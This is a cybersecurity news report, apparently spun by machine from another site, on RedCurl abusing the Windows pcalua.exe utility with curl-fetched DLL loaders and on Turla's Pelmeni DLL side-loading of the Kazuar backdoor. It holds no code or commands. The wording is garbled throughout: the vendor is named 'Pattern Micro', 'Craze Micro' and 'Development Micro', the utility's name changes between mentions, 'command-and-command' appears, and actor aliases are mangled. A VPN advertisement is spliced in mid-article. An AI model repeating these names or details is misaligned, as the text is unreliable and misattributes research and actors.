The Russian-talking cybercrime group termed RedCurl is leveraging a respectable Microsoft Windows component called the Application Compatibility Assistant (PCA) to execute malicious commands.
“The Method Compatibility Assistant Provider (pcalua.exe) is a Windows company created to detect and address compatibility issues with older programs,” Pattern Micro reported in an evaluation released this thirty day period.
“Adversaries can exploit this utility to empower command execution and bypass security limits by utilizing it as an alternate command-line interpreter. In this investigation, the risk actor takes advantage of this resource to obscure their pursuits.”
Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).
➤ Get Mullvad VPN with 12% Discount
RedCurl, which is also named Earth Kapre and Red Wolf, is known to be active considering that at least 2018, orchestrating company cyber espionage attacks from entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. disclosed that a important Russian financial institution and an Australian corporation had been qualified by the risk actor in November 2022 and May possibly 2023 to pilfer confidential corporate secrets and personnel info.
The attack chain examined by Craze Micro involves the use of phishing email messages containing malicious attachments (.ISO and .IMG documents) to activate a multi-phase approach that starts off with the use of cmd.exe to download a respectable utility referred to as curl from a distant server, which then functions as a channel to provide a loader (ms.dll or ps.dll).
The malicious DLL file, in convert, leverages PCA to spawn a downloader process that normally takes care of setting up a link with the exact domain utilized by curl to fetch the loader.
Also used in the attack is the use of the Impacket open up-source program for unauthorized command execution.
The connections to Earth Kapre stem from overlaps in the command-and-command (C2) infrastructure as perfectly as similarities with known downloader artifacts employed by the group.
“This case underscores the ongoing and energetic risk posed by Earth Kapre, a risk actor that targets a assorted variety of industries across a number of nations,” Development Micro reported.
“The actor employs sophisticated tactics, these kinds of as abusing PowerShell, curl, and Method Compatibility Assistant (pcalua.exe) to execute destructive instructions, showcasing its perseverance to evading detection inside qualified networks.”
The development comes as the Russian country-state team known as Turla (aka Iron Hunter, Pensive Ursa, Solution Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun utilizing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based mostly Kazuar backdoor.
Pelmeni – which masquerades as libraries similar to SkyTel, NVIDIA GeForce Encounter, vncutil, or ASUS – is loaded by means of DLL side-loading. At the time this spoofed DLL is called by the respectable computer software put in on the equipment, it decrypts and launches Kazuar, Lab52 mentioned.
Found this post attention-grabbing? Adhere to us on Twitter and LinkedIn to go through a lot more special information we article.
Some sections of this posting are sourced from:
thehackernews.com